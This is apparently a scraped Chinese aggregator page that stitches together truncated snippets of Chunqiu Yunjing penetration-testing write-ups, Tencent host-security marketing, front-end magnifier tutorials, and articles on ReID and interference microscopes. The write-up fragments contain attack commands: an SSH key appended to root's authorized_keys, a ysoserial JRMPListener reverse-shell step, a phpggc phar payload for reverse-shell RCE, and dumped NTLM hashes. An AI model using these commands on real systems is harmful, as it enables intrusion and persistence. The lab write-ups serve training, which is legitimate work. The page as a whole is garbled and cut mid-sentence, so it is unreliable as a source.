春秋云镜-Spoofing

工作期间某天项目经理找到，需要给客户录一个靶场的WP要求写详细一些过程，项目经理说云镜难度还是可以的，所以丢了一个Spoofing。但尴尬的是，当时平没有很快完成任务，实在是姿势盲区了（本人太菜了。 +zvvKmX+A6CDZZ4Kl0ABV+8dkYML/Jz5IQql8YdAgKCpHMoiV/bGwVTkCDRhuUXL1TW2m7pwXUw9RWM3i8G8WKnpMfQtsYXIo0Qatxx0Lxq3bpIEdkSKGTptGyCuvZCouUd5cpUpJJ4yrW8I0Jg9Zqqifsc2iRrwK6zcW7pHkLAkksEZC2DyM78iR5Fl4Z /PKiJHWYhThTFxByVsikp31q2gfATCx1vjmz6tm3AA/BPkrWtJ1xY9izsjlu46LdhTMD1U8BnJUhSuTUd2lAKjp9qKklp15wfdBbDk4SxWa6BNtwo6v1VDIfRkmPMhzU5ynm1OQsOLJKrRJHt0oJfrabD2e6UZ +DUSyA8Ha2E1FJiXbykqa6vV9THb6LltArhhFNikR42cqxUH1Q/qoM8bG00=" >> /root/.ssh/authorized_keys chmod 600 yangmei XIAORANG 25e42ef4cc0ab6a8ff9e3edbbda91841 6b2838f81b57faed5d860adaf9401b0edb269a6f 明文

排查云镜异常

排查云镜异常，可以收集云镜日志让售后看下C:\Program Files\QCloud\YunJing\log复制该目录，对复制后的目录进行压缩，压缩成.7z格式（压缩率高，压缩文件小，方便传输）云镜的 如果解析到同一个地址，telnet测试反而省事了，如果解析到多个地址，每个地址对应的端口都telnet测试下看看通不通s.yd.qcloud.coml.yd.qcloud.comu.yd.qcloud.com云镜域名的情况比较复杂 ，具体可参考官网文档：https://cloud.tencent.com/document/product/296/12236图片官网文档上虽然对云镜的域名分门别类这么多，但我建议以nslookup或dig

主机安全（云镜）产品简介

台以下，可以参考网上的一些文章来加固我们的服务器，如笔者之前整理的《Linux服务器安全加固10条建议》和《Windows服务器安全加固10条建议》等， 如果服务器不断的增加业务快速的膨胀这时就需要借助“云” 的安全力量，那就是“主机安全(云镜)”这款产品。 image.png 开通云主机时可以免费开通“主机安全”防护 image.png 什么是主机安全(云镜) 主机安全基于腾讯安全积累的海量威胁的数据，利用机器学习为用户提供黑客入侵检测和漏洞风险预警等安全防护服务 image.png 云镜的主要功能介绍 概览页面：https://console.cloud.tencent.com/cwp ； 资产列表（需要付费3元/台1天）： 直观的看到每台服务器上的端口、账号 image.png 本文参考 云镜产品介绍视频： https://cloud.tencent.com/edu/learning/course-1055-995 主机安全文档：https://cloud.tencent.com

内网渗透-春秋云镜篇(Privilege)

B8%97%E9%80%8F%E6%8A%80%E5%B7%A7-Windows%E4%B9%9D%E7%A7%8D%E6%9D%83%E9%99%90%E7%9A%84%E5%88%A9%E7%94% 22 5d 7f 0c 10 c9 96 19 7a bd 28 d7 c8 9a b7 ec 04 fb a9 18 83 30 e1 d9 75 aa ed c1 81 d0 76 c3 70 6c 68 35 e9 16 66 bd fe c7 92 78 59 be 9b 0b 65 91 10 8b 5b c4 8f 18 32 72 a6 cb bb c1 b0 96 0f 1d 63 bf 8f e8 4f 9b 7b 6a 7c 0a e8 2e 9a 40 d7 36 7d 2e 7a 0c 99 21 ca 64 27 b9 df 77 c6 f7 47 19 d7 bb 05 d6 4b ca e6 70 4b 62 5f 1c f8 78 b9 33 a2 f7 9e e5 77 78 db f9 cd b1 73 e9 b2 df 35 67 5e b0 12 85 ac 59

内网渗透之突破云镜-Delivery

CVE-2021-29505反弹shell   java -cp ysoserial.jar ysoserial.exploit.JRMPListener 1098 CommonsCollections6 

内网渗透 -春秋云镜篇之Hospital

open 172.30.54.12:3000 open 172.30.54.12:5432 open 172.30.54.179:8080 open [*] alive ports len is: 6

内网渗透-春秋云镜篇之Flarum

flarum-rce-tour.html 而后按部就班即可 漏洞利用 借助phpggc工具生成反弹Shell语句 php -d phar.readonly=0 phpggc -p tar -b Monolog/RCE6 time__1311=mqmx0DBD2Gqiw40vofDy7D9m6GOCDcGiG7oD&alichlgref=https%3A%2F%2Fxz.aliyun.com%2Fu%2F50470#toc :504:aad3b435b51404eeaad3b435b51404ee:b40dda6fd91a2212d118d83e94b61b11::: [*] Dumping cached domain logon [*] NL$KM 0000 8B 14 51 59 D7 67 45 80 9F 4A 54 4C 0D E1 D3 29 ..QY.gE..JTL...) 0010 3E B6 CC 22 FF B7 C5 74 7F E4 B0 AD E7 FA 90 0D >.."...t........ 0020 1B 77 20 D5 A6 67 31 E9 9E 38

内网渗透 -春秋云镜篇之Hospital

open 172.30.54.12:3000 open 172.30.54.12:5432 open 172.30.54.179:8080 open [*] alive ports len is: 6

【腾讯云】云镜-主机安全防护解决方案

image.png 云镜为腾讯云海量用户抵御黑客攻击 image.png 充分利用云的优势对密码破解行为进行拦截和预警 image.png 基于AI的WebShell检测技术 云镜WebShell检测优势 Q：云镜是否会采集我主机上的隐私数据？ Q：云镜的客户端稳定性如何，是否会造成业务影响？ Q：云镜的漏洞检测覆盖哪些范围，是否可以替代传统扫描器？ A：云镜漏洞检测功能主要侧重于高危可造成入侵的漏洞，包括WEB和系统组件，云镜对于新出现的漏洞有较快的响应速度，能在极短的时间内完成全部业务主机检测，可以避免扫描器策略更新滞后和扫描效率低带来的风险，对于历史上的漏洞

内网渗透—春秋云镜篇之2022网鼎杯

当时在这里卡住了，参考https://fushuling.com/index.php/2023/09/17/%e6%98%a5%e7%a7%8b%e4%ba%91%e5%a2%83%c2%b7%e7%bd %91%e9%bc%8e%e6%9d%af%e5%8d%8a%e5%86%b3%e8%b5%9b%e6%b2%a1%e6%89%93%e5%ae%8c/ 漏洞探测 首先添加用户，如果能够添加成功就说明漏洞存在

内网渗透—春秋云镜篇之2022网鼎杯

当时在这里卡住了，参考https://fushuling.com/index.php/2023/09/17/%e6%98%a5%e7%a7%8b%e4%ba%91%e5%a2%83%c2%b7%e7%bd %91%e9%bc%8e%e6%9d%af%e5%8d%8a%e5%86%b3%e8%b5%9b%e6%b2%a1%e6%89%93%e5%ae%8c/ 漏洞探测 首先添加用户，如果能够添加成功就说明漏洞存在

放大镜

放大镜：淘宝等电商页面应用广泛... 思路：先让move块和bimg块隐藏，当鼠标移动到box上时，使move块和bimg块显示，获取鼠标当前的位置，然后经过计算给与move块和bimg块适当的值实现放大镜效果 <! DOCTYPE html> <html> <head> <meta charset="UTF-8"> <title>放大镜</title> <style

腾讯主机安全（云镜）兵器库：WebShell克星-TAV引擎

TAV WebShell引擎的检测效果 在云上真实WebShell黑样本集中，腾讯TAV引擎的检测贡献率能达到99%以上。 相比于传统的特征检测方案，TAV WebShell检测引擎不仅有着超高的检测率，同时也有超低的误报率，在云上真实环境中，也具备较高的独报能力。 目前腾讯主机安全（云镜）已全面接入TAV WebShell检测能力，使腾讯云主机查杀防御WebShell攻击的能力得以大幅提升。 后续还将陆续接入腾讯安全其他产品，比如腾讯高级威胁检测系统（御界）、Web应用防火墙、云防火墙、零信任iOA等等产品，将全面增强在终端侧、主机侧、流量侧的安全能力。

放大镜原理

上面代码中，图片没有设置高度，我们在JavaScript中用 img.offsetWidth 来获取。获取之后设置 wrapper 的宽度与 img 的宽度相同。

放大镜效果

它核心是对相机应用，异名基于此实现一个放大镜的demo ? 相机有—个clearFlag如果你设置了，它在绘制画面的时候，会清理屏幕 一般只给前面的相机设置clearFlag；后面相机都不能再设置，不然会把前面相机绘制的内容清除掉 把思路拉回到放大镜demo中， 要实现放大镜，其实就是多创造一个相机去拍摄需要放大的物体，然后调整相机的缩放比例，使投影的物体放大或者缩小对应的倍数，然后配合使用Mask组件去裁剪我们需要的局部位置，mask的编辑器设置请参考项目源码

云从科技跨镜追踪（ReID）技术再次刷新世界记录

近日，云从科技在跨镜追踪技术（ReID,Person Re-identification）上再次取得重大进展，在三大主流ReID数据集Market-1501、DukeMTMC-reID、CUHK03上超过阿里巴巴 这是继去年云从科技刷新跨镜追踪技术世界纪录后，再一次在该领域领跑全球。 相较去年，云从科技在扩大算法领先优势的同时，也在跨镜追踪（ReID）技术的商业化中积累了丰富的实践经验，不仅核心算法速度提高了10倍，还围绕跨镜追踪（ReID）技术打造了行人检测、追踪、结构化等一系列算法模块 跨镜追踪技术作为人脸技术的重要补充和扩展，越来越多互联网巨头和科技独角兽开始意识到它的重要性，并逐渐在跨镜追踪研究领域投入资源。 云从科技作为这一领域较早的探索者和布局者，在跨镜追踪和其相关技术上，如行人检测、行人检索、行人轨迹跟踪、行人属性结构化、行人动作检测和识别等，都拥有大量技术经验积累。

$.extend()插件（放大镜）

1.结构

腾讯主机安全（云镜）兵器库：斩杀挖矿木马的利剑-BinaryAI引擎

这一期，我们向朋友们详细介绍腾讯安全技术团队如何利用人工智能方法，开发出BinaryAI引擎对样本文件进行软件成分分析，使未知挖矿木马检测能力大幅提升，目前腾讯主机安全（云镜）已率先集成BinaryAI image.png 据腾讯安全最新统计，在公有云的攻击事件当中，以挖矿为目的的入侵行为占比超过一半，达到54.9%，腾讯安全团队在过去30天捕获挖矿木马攻击事件累计超过6000件。 ---- 传统挖矿木马检测方案包含三个维度 1.静态检测：基于字符串常量、特征检测规则和文件hash的检测方法； 2.动态检测：基于矿池网络连接行为的检测方法； 3.主机层检测：云主机资源异常占用的检测方法 腾讯主机安全（云镜）已率先接入BinaryAI引擎，可以通过BinaryAI引擎检测未知挖矿木马威胁。

js放大镜效果

干涉显微镜是干涉仪和显微镜的组合

干涉显微镜是干涉仪和显微镜的组合，利用干涉条纹的弯曲量来测量表面的微观不平度。与其他光学技术相比，干涉显微镜具有较高的放大倍数和分辨率，而且表面信息直观，测量精度很高。 光束从显微物镜出来后，经分光镜分成两束，分别照射到参考镜和被测面，反射后再次经过分光镜、显微物镜汇合后发生干涉。 由于分光镜处于显微镜与被测面之间，显微镜的放大倍数不能太大，一般为1 倍、2.5 倍或5 倍，因此视场可以很大，而且分光镜限制了物镜的工作距离。 光线经分光镜分成两束，分别经过显微物镜照射在参考反射镜和被测表面上，反射光沿原路返回，在分光镜处交汇后产生干涉。 由于在分光镜后的测量光路和参考光路上分别加入相同的显微物镜，显微镜的放大倍数可以达到100 倍，甚至200 倍，分光镜不限制物镜的工作距离。但参考光路和测量光路的物镜需要匹配，否则会影响光程差。